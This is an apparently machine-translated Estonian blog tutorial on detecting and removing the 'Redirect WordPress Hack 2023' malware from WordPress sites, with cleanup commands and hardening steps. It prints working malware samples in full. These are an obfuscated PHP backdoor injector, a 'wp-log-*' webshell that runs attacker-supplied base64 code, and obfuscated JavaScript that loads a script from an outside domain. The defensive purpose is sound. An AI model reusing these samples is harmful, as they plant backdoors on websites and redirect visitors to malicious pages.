WordPress on kindlasti enim kasutatud platvorm CMS (Content Management System) Nii ajaveebide kui ka veebipõhiste stardikaupluste (koos WooCommerce mooduliga) jaoks, mis teeb sellest kõige rohkem arvutirünnakuid (häkkimine). Üks enim kasutatud häkkimisoperatsioonide eesmärk on suunata ohustatud veebisait teistele veebilehtedele. Redirect WordPress Hack 2023 on suhteliselt uus pahavara, mis mõjutab kogu saidi veebilehtede rämpsposti ümbersuunamist või mis omakorda võib kasutajate arvutid viirused.
sisu
Kui teie sait WordPressil välja töötatud sait suunatakse teisele saidile, on ohver juba kuulus ümbersuunamishäkk.
Selles õpetuses leiate vajaliku teabe ja kasulikud näpunäited, mille kaudu saate ümbersuunamisega nakatunud veebisaidi jätta WordPress Hack (Virus Redirect). Kommentaaride kaudu saate lisateavet või küsida abi.
WordPressi saidid ümber suunava viiruse tuvastamine
Esimesed märgid on esimesed märgid, et midagi pole õige, vähendada liikluse järsku ja põhjendamatut liikluse langust saidil, vähendab tellimuste arvu (veebipoodide puhul) või reklaamikviituate arvu. Avastamine “Redirect WordPress Hack 2023” (Ümbersuunamine viirus) saab teha ja “visuaalne” Veebisaidi avamisel ja teid suunatakse teisele veebilehele.
Kogemuste põhjal ühilduvad enamik veebivarude rakendusi Interneti -brauseritega: Chrome, Firefox, Edge, Opera. Kui olete Maci arvutikasutaja, pole need viirused Safari brauseris eriti nähtavad. Safari turvasüsteem blokeerib need pahatahtlikud skriptid vaikselt.
Mida peate tegema, kui teil on WordPress Hack Word Hack viiruse veebisait
Loodan, et esimene meede ei ole veebisaidi paanikas ega kustutamine. Isegi viiruse- ega viirusefaile ei tohiks esimeses etapis kustutada. Need sisaldavad väärtuslikku teavet, mis aitab teil mõista, kus on turvarikkumine ja mida viirus on mõjutanud. MODUS OPERANDI.
Sulgege avalikkuse veebisait.
Kuidas sulgeda külastajatele viiruse veebisaiti? Kõige lihtsam on kasutada DNS -i haldurit ja kustutada tema IP “A” (domeeninimi) või määratlege olematu IP. Seega kaitstakse veebisaidi külastajaid selle ümbersuunamise WordPressi häkkimise eest, mis võib neid võtta viiruse või rämpsposti veebilehtedel.
Kui kasutate CloudFlare DNS -haldurina autentige oma kontol ja kustutate DNS -kirjed “A” domeeninime jaoks. Seega jääb viiruse mõjutatud piirkond ilma IP -ta, et ei pääse Internetist juurde.
Kopeerige veebisaidi IP ja tehke “teekond” et pääseda ainult teile. Arvutist.
Kuidas muuta Windowsi arvutites veebisaidi tegelikku IP -d?
Meetodit kasutatakse sageli teatud veebisaitidele juurdepääsu blokeerimiseks, faili redigeerides “võõrustajad”.
1. Avage Notepad või mõni muu tekstiredaktor (koos administraatori õigustega) ja redigeerige faili “hosts“. See asub:
C:\Windows\System32\drivers\etc\hosts2. failis “võõrustajad” lisama “teekond” Teie veebisaidi reaalsele IP -le. IP kustutati ülaltoodud DNS Managerist.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3. Salvestage fail ja pääsege brauseri veebisaidile.
Kui veebisait ei avane ja te ei teinud failis viga “võõrustajad”, tõenäoliselt on DNS -i vahemälu.
Windowsi opsüsteemis DNS -i vahemälu kustutamiseks avage käsuviip, kus täidate tellimuse:
ipconfig /flushdnsKuidas muuta Mac / MacBook arvutites veebisaidi tegelikku IP -d?
MAC -i arvutikasutajate jaoks on veebisaidi tegelikku IP -i muutmine pisut lihtsam muuta.
1. avage utiliit Terminal.
2. Tehke käsurida (nõuab täitmiseks süsteemi parooli):
sudo nano /etc/hosts3. Windowsi arvutite osas lisage domeeni reaalne IP.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4. Salvestage muudatused. Ctrl+X (y).
Pärast seda, kui olete teinud “teekond”, olete ainus inimene, kes pääseb WordPressi Hack Word Hack viiruse veebisaidile.
Täieliku varunduse veebisait – Failid ja andmebaas
Isegi kui see on viirus “ümbersuunamine WordPressi häkkimine”, on soovitus teha kogu veebisaidi üldine varukoopia. Failid ja andmebaas. Võimalik, et saate salvestada mõlema faili kohaliku koopia public / public_html samuti andmebaas.
WordPress Hack 2023 viiruse ja modifitseeritud failide tuvastamine
Peamised sihtfailid WordPress Ma olen index.php (juuri), header.php, index.php ja footer.php WordPressi aktiivse teema kohta. Kontrollige neid faile käsitsi ja tuvastage pahatekood või pahavara skript.
Aastal 2023 on tüüpi viirus “Ümbersuunamine WordPressi häkkimine” sisse panema index.php Vormi kood:
(Ma ei soovita teil neid koode täita!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>Dekodeeritud, see skripti pahavara See on praktiliselt WordPressi veebisaidi tagajärg. Pahavara rakenduse alus ei ole skript, kuid virude veebisaidi suunamine võimaldab skripti. Kui dekodeerime ülaltoodud skripti, saame:
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Kuna kõik seda koodi sisaldavad serveris olevad failid on hea, on hea juurdepääs SSH Serverile Check -UP ja Administrationi failide käivitamiseks Linuxis.
Seotud: Kuidas leiate, kas teil on Google'i otsingu abil viiruse ajaveeb või mitte. (WordPressi viirus)
Allpool on kaks käsku, mis on kindlasti abiks hiljuti muudetud failide ja konkreetse koodi (string) sisaldavate failide tuvastamisel.
Kuidas näete PHP -faile, mida on muudetud viimase 24 tunni jooksul või Linuxi muus ajavahemikus?
Käsk “find” Seda on väga lihtne kasutada ja see võimaldab isikupärastamisel ajavahemikku, plaastrit, milles otsinguid ja tüüpi faile tehakse.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"Väljundis saate teavet faili muudetud kuupäeva ja kellaaja kohta, kirjutades / lugemis- / täitmislubasid (chmod) ja kelle rühm / kasutaja kuulub.
Kui soovite mitu päeva tagasi kontrollida, muutke väärtust “-mtime -1” või kasutada “-mmin -360” minutiks (6 tundi).
Kuidas otsite koodi (string) PHP -failide sees, Java?
Käsurida “leidma” Selle kaudu leiate kiiresti kõik PHP või Java -failid, mis sisaldavad konkreetset koodi, järgmine:
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +Tellimus otsib ja kuvab faile .php ja .js sisaldav “uJjBRODYsU“.
Ülaltoodud kahe tellimuse abil leiate väga hõlpsalt, milliseid faile on viimasel ajal muudetud, ja sisaldavad pahavarakoodi.
Eemaldab pahavara modifitseeritud failidest ilma õiget koodi kahjustamata. Minu stsenaariumi korral pandi pahavara kood enne avamist <head>.
Esimese järjekorra täitmisel “leidma” Serveris on väga võimalik avastada uusi faile, mis pole WordPress ega sinna pandud. Failid, mis kuulutavad WordPressi häkkimise ümbersuunamise viirust.
Minu poolt uuritud stsenaariumi korral ilmusid serverisse vormifailid “wp-log-nOXdgD.php“. Need on failid “põlvkond” mis sisaldavad ka ümbersuunamisviiruse kasutatavat pahavarakoodi.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}Tüüpifailide eesmärk “wp-log-*” See on levitamine ümbersuunamise häkkimisviiruse ja muude serveris hostitavate veebisaitide levitamiseks. On tüübi pahavara kood “webshell” koosneb ühest põhiosa (milles määratletakse mõned krüptitud muutujad) ja O täitmisosa mille abil ründaja üritab süsteemis pahavarakoodi laadida ja käivitada.
Kui on muutuja POST helistatud ‘bh‘ ja selle krüptitud väärtus MD5 on võrdne “8f1f964a4b4d8d1ac3f0386693d28d03“, siis näib, et skript kirjutab krüptitud sisu base64 teise muutuja nimega ‘b3‘ ajutises failis ja proovige seejärel lisada see ajutine fail.
Kui on muutuja POST või GET helistatud ‘tick'Skript reageerib väärtusega MD5 stringi “885“.
Kõigi seda koodi sisaldavate serveri failide tuvastamiseks valige string, mis on tavaline, seejärel täitke käsk “find” (Sarnaselt ülaltooduga). Kustutage kõik seda pahavarakoodi sisaldavad failid.
Turvarikkumine, mida haldab Redirect WordPress Hack
Tõenäoliselt jõuab see ümbersuunatav viirus läbi WordPressi administratsiooni kasutaja ärakasutamine või tuvastades a haavatav pistikprogramm mis võimaldab lisada administraatori privileegidega kasutajaid.
Enamiku WordPressi platvormile ehitatud veebisaitide jaoks on võimalik Teemade või pistikprogrammi teemade redigeeriminehaldusliidesesse (Dashboard). Seega saab pahatahtlik inimene lisada ülaltoodud skriptide tekitava teema pahavara faile.
Sellise pahavara näide on see:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript tuvastatud WordPressi teema päises kohe pärast sildi avamist <head>.
Seda JavaScripti on üsna keeruline dekrüpteerida, kuid on ilmne, et teine veebiaadress toob kõige tõenäolisemalt muid skripte failide loomiseks “wp-log-*” millest ma eespool rääkisin.
Otsige ja kustutage see kood kõigist failidest PHP mõjutatud.
Niipalju kui ma sain aru saada, oli see kood käsitsi lisatud uue kasutaja poolt, kellel on administratiivsed privileegid.
Niisiis, et vältida pahavara lisamist armatuurlaual, on kõige parem keelata WordPressi / pistikprogrammid armatuurlaual.
Redigeeri faili wp-config.php ja lisage read:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);Pärast selle muudatuse tegemist ei saa ükski WordPressi kasutaja armatuurlaua faile redigeerida.
Kontrollige administraatori rolliga kasutajaid
Allpool on SQL -päring, mida saate WordPressi platvormil administraatoriga kasutajate otsimiseks kasutada:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'See päring tagastab kõik tabeli kasutajad wp_users kes omistas administraatori rolli. Päring tehakse laua jaoks wp_usermeta meta otsida ‘wp_capabilities', Mis sisaldab teavet kasutajate rollide kohta.
Teine meetod on nende tuvastamine: Dashboard → Users → All Users → Administrator. Kuid ma praktiseerin, et kasutaja saab armatuurlaua paneelile peita. Nii et parim viis kasutajate nägemiseks “Administraator” WordPress on ülaltoodud käsk SQL.
Minu puhul tuvastasin andmebaasis kasutaja nimega “wp-import-user“. Üsna sugestiivne.
Siit näete WordPressi kasutaja loomise kuupäeva ja kellaaega. Kasutaja kasutaja on ka väga oluline, kuna ta otsis serverilogisid. Nii näete kogu selle kasutaja tegevust.
Kustutage kasutajad administraatori rolliga et te siis ei tea Muutke oma paroole kõigile halduskasutajatele. Toimetaja, autor, administraator.
Muutke SQL kasutaja parool andmebaasi mõjutatud veebisaidist.
Pärast nende sammude vastuvõtmist saab veebisaiti kõigi kasutajate jaoks taaskäivitada.
Pange siiski tähele, et see, mida ma eespool esitasin, on üks tuhandetest sülitustest, mille abil veebisait on WordPressi häkkimisega 2023. aastal.
Kui teie veebisait on olnud viirus ja vajab abi või kui teil on probleeme, on kommentaarikast avatud.
